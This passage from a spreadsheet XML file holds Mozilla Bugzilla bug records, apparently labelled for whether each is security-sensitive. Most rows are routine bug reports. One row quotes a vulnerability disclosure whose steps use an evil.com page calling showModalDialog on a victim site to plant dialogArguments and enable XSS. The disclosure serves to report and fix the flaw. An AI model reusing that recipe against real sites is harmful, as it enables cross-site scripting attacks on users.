        <v>3</v>
      </c>
      <c r="H3340" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3340" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3340" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3340" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3340" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3340" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3340" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3340" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3340" t="inlineStr">
        <is>
          <t>[sg:moderate][needs 1.9.1 landing]</t>
        </is>
      </c>
      <c r="Q3340" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3340" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3340" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3340" t="n">
        <v>1</v>
      </c>
      <c r="U3340" t="n">
        <v>0</v>
      </c>
      <c r="V3340" t="n">
        <v>53</v>
      </c>
      <c r="W3340" t="inlineStr">
        <is>
          <t>Created attachment 389157
testcase sets window.dialogArguments
This issue was reported to security@m.o by Microsoft Vulnerability Research.  Credit should go to Hidetake Jo and Microsoft Vulnerability Research.
I can confirm in Firefox 3.5 that the properties of window.dialogArguments are accessible by script across domains.  I will attach the testcases shortly.  From the email:
-----
Title:
Name Cross-Domain window.dialogVaribles Initialization in Firefox 3.5 [MSVR-0047]
Description:
General mechanism for Cross-site scripting 
It appears that Firefox 3.5 permits cross-domain initialization of window.dialogVariables.  This behavior is unlike that of IE and Safari, and would allow exploit of XSS in web pages which assume that the page's dialogVariable can't be initialized in this way.
Technical details of exploit:
1. Find a page on the internet that is reading and using value from window.dialogArguments.
2. On evil.com create a page that calls window.showModalDialog (http://victim.com/page.xx &lt;http://victim.com/page.xx&gt; , ...);
2a. This allows you to initialize the window.dialogArguments on the victim domain.
3. Lure victim to the exploit page on evil.com
Finder(s):
Hidetake Jo and Microsoft Vulnerability Research.
Type of Issue:
Cross-domain initialization of window.dialogArguments enabling XSS exploits
Product(s) and version(s) that contain the bug:
Firefox 3.5
The finders have not tested against other versions of Firefox or against platforms other than Windows Vista Sp1
Special configuration requirements:
No special hardware or configuration is needed. The PoC has been demonstrated on a system with Windows Vista Sp1 + latest security updates (as of July 2009)</t>
        </is>
      </c>
      <c r="X3340" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3341">
      <c r="A3341" t="n">
        <v>453923</v>
      </c>
      <c r="B3341" t="inlineStr">
        <is>
          <t>2008-09-05 18:53:11 -0700</t>
        </is>
      </c>
      <c r="C3341" t="inlineStr">
        <is>
          <t>sign-files tool on keymaster ignores hg source.bundle</t>
        </is>
      </c>
      <c r="D3341" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3341" t="n">
        <v>1</v>
      </c>
      <c r="F3341" t="n">
        <v>1</v>
      </c>
      <c r="G3341" t="n">
        <v>5</v>
      </c>
      <c r="H3341" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3341" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3341" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3341" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3341" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3341" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N3341" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3341" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3341" t="inlineStr">
        <is>
          <t>[hg-automation]</t>
        </is>
      </c>
      <c r="Q3341" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3341" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3341" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3341" t="n">
        <v>1</v>
      </c>
      <c r="U3341" t="n">
        <v>0</v>
      </c>
      <c r="V3341" t="n">
        <v>4</v>
      </c>
      <c r="W3341" t="inlineStr">
        <is>
          <t>While signing the FF3.1a2 builds, I noticed that an asc file was correctly generated for *source.tar.bz2, but that no asc file was generated for the hg source.bundle file.
Can we enhance sign-files to support source.bundle files?</t>
        </is>
      </c>
      <c r="X3341" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3342">
      <c r="A3342" t="n">
        <v>1395369</v>
      </c>
      <c r="B3342" t="inlineStr">
        <is>
          <t>2017-08-30 15:48:39 -0700</t>
        </is>
      </c>
      <c r="C3342" t="inlineStr">
        <is>
          <t>The stub installer progress bar retreats from 100% when it exits</t>
        </is>
      </c>
      <c r="D3342" t="inlineStr">
        <is>
          <t>2017-09-05 09:40:45 -0700</t>
        </is>
      </c>
      <c r="E3342" t="n">
        <v>1</v>
      </c>
      <c r="F3342" t="n">
        <v>1</v>
      </c>
      <c r="G3342" t="n">
        <v>2</v>
      </c>
      <c r="H3342" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3342" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3342" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K3342" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3342" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3342" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3342" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3342" t="inlineStr"/>
      <c r="Q3342" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3342" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3342" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3342" t="n">
        <v>1</v>
      </c>
      <c r="U3342" t="n">
        <v>0</v>
      </c>
      <c r="V3342" t="n">
        <v>9</v>
      </c>
      <c r="W3342" t="inlineStr">
        <is>
          <t>Steps  to reproduce:
Screen capture is here: https://testing-1.tinytake.com/sf/MTkxODAzMV82MTEyMDM0
1. Download stub installer from Mozilla-Central
2. Observe the progress bar 
Actual Result:
The progress bar retreats when the installer is about to exit.
Expected Result:
Progress bar should stay at 100% until the browser starts</t>
        </is>
      </c>
      <c r="X3342" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3343">
      <c r="A3343" t="n">
        <v>662309</v>
      </c>
      <c r="B3343" t="inlineStr">
        <is>
          <t>2011-06-06 10:34:55 -0700</t>
        </is>
      </c>
      <c r="C3343" t="inlineStr">
        <is>
          <t>.jar should be marked executable</t>
        </is>
      </c>
      <c r="D3343" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E3343" t="n">
        <v>1</v>
      </c>
      <c r="F3343" t="n">
        <v>1</v>
      </c>
      <c r="G3343" t="n">
        <v>6</v>
      </c>
      <c r="H3343" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3343" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3343" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K3343" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3343" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3343" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3343" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3343" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3343" t="inlineStr">
        <is>
          <t>[sg:critical][blocks-fx5b5][qa!]</t>
        </is>
      </c>
      <c r="Q3343" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3343" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3343" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T3343" t="n">
        <v>1</v>
      </c>
      <c r="U3343" t="n">
        <v>0</v>
      </c>
      <c r="V3343" t="n">
        <v>20</v>
      </c>
      <c r="W3343" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #657462 +++
If Java is installed "opening" a .jar file will launch a Java Application, which is definitely not 'web safe'. Since a .jar application can launch executables (among other things) we should mark that as an executable type so that users are forced to download and manually open rather than allow then to open from the download prompt (or worse, set it to auto-open).
We should check to see if Java registers any other extensions while we're at it.</t>
        </is>
      </c>
      <c r="X3343" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3344">
      <c r="A3344" t="n">
        <v>874251</v>
      </c>
      <c r="B3344" t="inlineStr">
        <is>
          <t>2013-05-20 16:12:20 -0700</t>
        </is>
      </c>
      <c r="C3344" t="inlineStr">
        <is>
          <t>[traceback] DoesNotExist: Addon matching query does not exist - Cannot log in to theme review queue</t>
        </is>
      </c>
      <c r="D3344" t="inlineStr">
        <is>
          <t>2016-02-04 14:47:12 -0800</t>
        </is>
      </c>
      <c r="E3344" t="n">
        <v>1</v>
      </c>
      <c r="F3344" t="n">
        <v>1</v>
      </c>
      <c r="G3344" t="n">
        <v>6</v>
      </c>
      <c r="H3344" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3344" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3344" t="inlineStr">
        <is>
          <t>Admin/Editor Tools</t>
        </is>
      </c>
      <c r="K3344" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3344" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3344" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3344" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3344" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3344" t="inlineStr"/>
      <c r="Q3344" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3344" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3344" t="inlineStr">
        <is>
          <t>2013-05-23</t>
        </is>
      </c>
      <c r="T3344" t="n">
        <v>1</v>
      </c>
      <c r="U3344" t="n">
        <v>0</v>
      </c>
      <c r="V3344" t="n">
        <v>4</v>
      </c>
      <c r="W3344" t="inlineStr">
        <is>
          <t>When I go to https://marketplace.firefox.com/reviewers/themes/queue/, I see this page: http://i.imgur.com/qlinpq6.png
I see this page whether or not I'm logged into https://marketplace.firefox.com</t>
        </is>
      </c>
      <c r="X3344" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3345">
      <c r="A3345" t="n">
        <v>97676</v>
      </c>
      <c r="B3345" t="inlineStr">
        <is>
          <t>2001-08-30 15:12:19 -0700</t>
        </is>
      </c>
      <c r="C3345" t="inlineStr">
        <is>
          <t>OS X, helper apps: unable to open either predefined or chosen app</t>
        </is>
      </c>
      <c r="D3345" t="inlineStr">
        <is>
          <t>2004-11-23 18:54:58 -0800</t>
        </is>
      </c>
      <c r="E3345" t="n">
        <v>1</v>
      </c>
      <c r="F3345" t="n">
        <v>1</v>
      </c>
      <c r="G3345" t="n">
        <v>2</v>
      </c>
      <c r="H3345" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3345" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3345" t="inlineStr">
        <is>
          <t>UI Design</t>
        </is>
      </c>
      <c r="K3345" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3345" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M3345" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3345" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3345" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3345" t="inlineStr">
        <is>
          <t>[PDT+], [OSX+], [ETA 09.27 - see comments for details]</t>
        </is>
      </c>
      <c r="Q3345" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3345" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3345" t="inlineStr">
        <is>
          <t>mozilla0.9.5</t>
        </is>
      </c>
      <c r="T3345" t="n">
        <v>1</v>
      </c>
      <c r="U3345" t="n">
        <v>0</v>
      </c>
      <c r="V3345" t="n">
        <v>35</v>
      </c>
      <c r="W3345" t="inlineStr">
        <is>
          <t>found using 2001.08.30.05-comm bits on Mac OS X [10.0.4].
n6.x won't open either the predefined/OS helper app or a user-chosen 
helper app.
predefined helper app test:
1. go to http://mozilla.org and click on any of the download links.
2. the helper dialog that comes up will have "Open with StuffIt Expander" 
[at least on my machine].
3. click OK, then the download progress dialog appears.
results: after download is complete, Stuffit Expander doesn't launch. i 
checked the download folder, and that's there is the salted [temp] 
filename. and, if i exit the app, that salted file disappears [deleted].
user-chosen helper app test:
1. go to ftp://ftp.mozilla.org/pub/mozilla/nightly/ and select a dir which contains a filetype which wouldn't have an OS-defined helper app. for me, .bz2 files work.
2. the helper app dialog that appears will have "Open &lt;no application 
specified&gt;" and the "Save this file to disk" radiobutton will be selected.
3. click Choose. on my machine, i somehow cannot select the carbon 
version of Stuffit Expander [in Magpie:Applications:Utilities] --a 10.0.4 
bug? so, instead i select the classic version of the same app [in 
Perla:Applications (Mac OS 9):Internet Utilities:Aladdin folder:Stuffit 
Expander 5.5].
4. click OK, the download progress dialog appears.
results: as with predefined helper apps, Stuffit Expander doesn't launch 
after download is complete. again i checked the download folder, and 
there's a salted [temp] filename. and, again, if i exit the app, that salted file 
goes away [deleted].</t>
        </is>
      </c>
      <c r="X3345" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3346">
      <c r="A3346" t="n">
        <v>1618842</v>
      </c>
      <c r="B3346" t="inlineStr">
        <is>
          <t>2020-02-28 04:59:46 -0800</t>
        </is>
      </c>
      <c r="C3346" t="inlineStr">
        <is>
          <t>Integrate the secretary tool into the PerfSheriffBot</t>
        </is>
      </c>
      <c r="D3346" t="inlineStr">
        <is>
          <t>2021-02-23 06:21:56 -0800</t>
        </is>
      </c>
      <c r="E3346" t="n">
        <v>1</v>
      </c>
      <c r="F3346" t="n">
        <v>1</v>
      </c>
      <c r="G3346" t="n">
        <v>7</v>
      </c>
      <c r="H3346" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3346" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3346" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K3346" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3346" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3346" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3346" t="inlineStr"/>
      <c r="Q3346" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3346" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3346" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3346" t="n">
        <v>1</v>
      </c>
      <c r="U3346" t="n">
        <v>0</v>
      </c>
      <c r="V3346" t="n">
        <v>2</v>
      </c>
      <c r="W3346" t="inlineStr">
        <is>
          <t>We must ensure this runs 1st on PerfSheriffBot.
The integrated functionality should be guarded by source code feature flag. This feature flag will be disabled initially, but we plan to enable it in bug 1618829.
Accompany this with test coverage.</t>
        </is>
      </c>
      <c r="X3346" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3347">
      <c r="A3347" t="n">
        <v>48472</v>
      </c>
      <c r="B3347" t="inlineStr">
        <is>
          <t>2000-08-10 13:49:24 -0700</t>
        </is>
      </c>
      <c r="C3347" t="inlineStr">
        <is>
          <t>Typing Japanese characters crashes browser</t>
        </is>
      </c>
      <c r="D3347" t="inlineStr">
        <is>
          <t>2000-08-16 10:39:30 -0700</t>
        </is>
      </c>
      <c r="E3347" t="n">
        <v>1</v>
      </c>
      <c r="F3347" t="n">
        <v>1</v>
      </c>
      <c r="G3347" t="n">
        <v>3</v>
      </c>
      <c r="H3347" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3347" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3347" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K3347" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3347" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3347" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N3347" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3347" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3347" t="inlineStr">
        <is>
          <t>[dogfood+][nsbeta3+][p:1]</t>
        </is>
      </c>
      <c r="Q3347" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3347" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3347" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T3347" t="n">
        <v>1</v>
      </c>
      <c r="U3347" t="n">
        <v>0</v>
      </c>
      <c r="V3347" t="n">
        <v>22</v>
      </c>
      <c r="W3347" t="inlineStr">
        <is>
          <t>-start browser
-Tasks|Composer
-set japanese IME
-type japanese characters in the composer body and it will crash
-reproducible always on all platforms 2000-08-10-09-M18</t>
        </is>
      </c>
      <c r="X3347" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3348">
      <c r="A3348" t="n">
        <v>671160</v>
      </c>
      <c r="B3348" t="inlineStr">
        <is>
          <t>2011-07-12 18:48:09 -0700</t>
        </is>
      </c>
      <c r="C3348" t="inlineStr">
        <is>
          <t>ASSERTION: Uh, inner window set as event target!</t>
        </is>
      </c>
      <c r="D3348" t="inlineStr">
        <is>
          <t>2012-01-19 11:32:24 -0800</t>
        </is>
      </c>
      <c r="E3348" t="n">
        <v>1</v>
      </c>
      <c r="F3348" t="n">
        <v>1</v>
      </c>
      <c r="G3348" t="n">
        <v>3</v>
      </c>
      <c r="H3348" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3348" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3348" t="inlineStr">
        <is>
          <t>Password Manager</t>
        </is>
      </c>
      <c r="K3348" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3348" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3348" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3348" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3348" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3348" t="inlineStr">
        <is>
          <t>[sg:high][qa-]</t>
        </is>
      </c>
      <c r="Q3348" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3348" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3348" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T3348" t="n">
        <v>1</v>
      </c>
      <c r="U3348" t="n">
        <v>0</v>
      </c>
      <c r="V3348" t="n">
        <v>13</v>
      </c>
      <c r="W3348" t="inlineStr">
        <is>
          <t>STEPS TO REPRODUCE
1. run mochitest toolkit/components/passwordmgr/test/test_master_password.html
ACTUAL RESULTS
###!!! ASSERTION: Uh, inner window set as event target!: '!win || !win-&gt;IsInnerWindow()', file content/events/src/nsDOMEvent.cpp, line 878
PLATFORMS AND BUILDS TESTED
Bug occurs in a local mozilla-central DEBUG build on Linux x86-64</t>
        </is>
      </c>
      <c r="X3348" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3349">
      <c r="A3349" t="n">
        <v>1358868</v>
      </c>
      <c r="B3349" t="inlineStr">
        <is>
          <t>2017-04-23 02:22:36 -0700</t>
        </is>
      </c>
      <c r="C3349" t="inlineStr">
        <is>
          <t>Crash in `anonymous namespace''::wasapi_stream_start</t>
        </is>
      </c>
      <c r="D3349" t="inlineStr">
        <is>
          <t>2017-05-22 02:29:52 -0700</t>
        </is>
      </c>
      <c r="E3349" t="n">
        <v>1</v>
      </c>
      <c r="F3349" t="n">
        <v>1</v>
      </c>
      <c r="G3349" t="n">
        <v>3</v>
      </c>
      <c r="H3349" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3349" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3349" t="inlineStr">
        <is>
          <t>Audio/Video: cubeb</t>
        </is>
      </c>
      <c r="K3349" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L3349" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3349" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3349" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3349" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3349" t="inlineStr"/>
      <c r="Q3349" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3349" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3349" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T3349" t="n">
        <v>1</v>
      </c>
      <c r="U3349" t="n">
        <v>0</v>
      </c>
      <c r="V3349" t="n">
        <v>31</v>
      </c>
      <c r="W3349" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-b51a6e42-803f-49e5-9128-8c2030170422.
=============================================================
Crashing Thread (37)
Frame 	Module 	Signature 	Source
0 	xul.dll 	`anonymous namespace'::wasapi_stream_start 	media/libcubeb/src/cubeb_wasapi.cpp:1917
1 	xul.dll 	cubeb_stream_start 	media/libcubeb/src/cubeb.c:349
2 	xul.dll 	mozilla::AudioStream::InvokeCubeb&lt;int (*)(cubeb_stream*)&gt;(int (*)(cubeb_stream*)) 	dom/media/AudioStream.cpp:317
3 	xul.dll 	mozilla::AudioStream::Resume() 	dom/media/AudioStream.cpp:450
4 	xul.dll 	mozilla::media::AudioSink::SetPlaying(bool) 	dom/media/mediasink/AudioSink.cpp:189
5 	xul.dll 	mozilla::media::AudioSinkWrapper::SetPlaying(bool) 	dom/media/mediasink/AudioSinkWrapper.cpp:164
6 	xul.dll 	mozilla::media::VideoSink::SetPlaying(bool) 	dom/media/mediasink/VideoSink.cpp:156
7 	xul.dll 	mozilla::MediaDecoderStateMachine::MaybeStartPlayback() 	dom/media/MediaDecoderStateMachine.cpp:2919
8 	xul.dll 	mozilla::MediaDecoderStateMachine::DecodingState::Step() 	dom/media/MediaDecoderStateMachine.cpp:685
9 	xul.dll 	mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() 	obj-firefox/dist/include/mozilla/TaskDispatcher.h:205
10 	xul.dll 	mozilla::TaskQueue::Runner::Run() 	xpcom/threads/TaskQueue.cpp:232
11 	xul.dll 	nsThreadPool::Run() 	xpcom/threads/nsThreadPool.cpp:225
12 	xul.dll 	nsThread::ProcessNextEvent(bool, bool*) 	xpcom/threads/nsThread.cpp:1270
13 	xul.dll 	NS_ProcessNextEvent(nsIThread*, bool) 	xpcom/threads/nsThreadUtils.cpp:389
14 	xul.dll 	mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:338
15 	xul.dll 	MessageLoop::RunHandler() 	ipc/chromium/src/base/message_loop.cc:231
16 	xul.dll 	MessageLoop::Run() 	ipc/chromium/src/base/message_loop.cc:211
17 	xul.dll 	nsThread::ThreadFunc(void*) 	xpcom/threads/nsThread.cpp:501
18 	nss3.dll 	_PR_NativeRunThread 	nsprpub/pr/src/threads/combined/pruthr.c:397
19 	nss3.dll 	pr_root 	nsprpub/pr/src/md/windows/w95thred.c:95
20 	ucrtbase.dll 	_o__CIpow 	
21 	kernel32.dll 	BaseThreadInitThunk 	
22 	ntdll.dll 	__RtlUserThreadStart 	
23 	ntdll.dll 	_RtlUserThreadStart
these crashes started (re)appearing in firefox since 54.0a1 build 20170211030205 and in a regular fashion thereafter, so it's likely related to bug 1337805 which landed the day before.
the crashes are hitting users of 32bit and 64bit versions of firefox on windows and all the report are annotated with MOZ_RELEASE_ASSERT(stm &amp;&amp; !stm-&gt;thread &amp;&amp; !stm-&gt;shutdown_event) added in bug 1280280. in stability data for 54.0b1 the signature currently accounts for 0.5% of browser crashes and 1.1% of content process crashes.</t>
        </is>
      </c>
      <c r="X3349" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3350">
      <c r="A3350" t="n">
        <v>307809</v>
      </c>
      <c r="B3350" t="inlineStr">
        <is>
          <t>2005-09-09 16:21:46 -0700</t>
        </is>
      </c>
      <c r="C3350" t="inlineStr">
        <is>
          <t>Crash involving nested elements with style="display: -moz-grid-group;" [@ nsGridRowLayout::GetGrid]</t>
        </is>
      </c>
      <c r="D3350" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:43 -0700</t>
        </is>
      </c>
      <c r="E3350" t="n">
        <v>1</v>
      </c>
      <c r="F3350" t="n">
        <v>1</v>
      </c>
      <c r="G3350" t="n">
        <v>3</v>
      </c>
      <c r="H3350" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3350" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3350" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3350" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3350" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M3350" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3350" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3350" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3350" t="inlineStr">
        <is>
          <t>[sg:nse null-deref]</t>
        </is>
      </c>
      <c r="Q3350" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3350" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3350" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T3350" t="n">
        <v>1</v>
      </c>
      <c r="U3350" t="n">
        <v>0</v>
      </c>
      <c r="V3350" t="n">
        <v>19</v>
      </c>
      <c r="W3350" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20050908
Firefox/1.6a1
Filing as security-sensitive because the testcase includes code from bug 306939
and I didn't manage to make a simplified testcase.</t>
        </is>
      </c>
      <c r="X3350" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3351">
      <c r="A3351" t="n">
        <v>845880</v>
      </c>
      <c r="B3351" t="inlineStr">
        <is>
          <t>2013-02-27 09:27:12 -0800</t>
        </is>
      </c>
      <c r="C3351" t="inlineStr">
        <is>
          <t>Drag-and-Drop and File Extension Bugs Enable Dropping of Malicious File</t>
        </is>
      </c>
      <c r="D3351" t="inlineStr">
        <is>
          <t>2023-01-16 20:32:06 -0800</t>
        </is>
      </c>
      <c r="E3351" t="n">
        <v>1</v>
      </c>
      <c r="F3351" t="n">
        <v>1</v>
      </c>
      <c r="G3351" t="n">
        <v>3</v>
      </c>
      <c r="H3351" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3351" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3351" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K3351" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3351" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3351" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3351" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3351" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
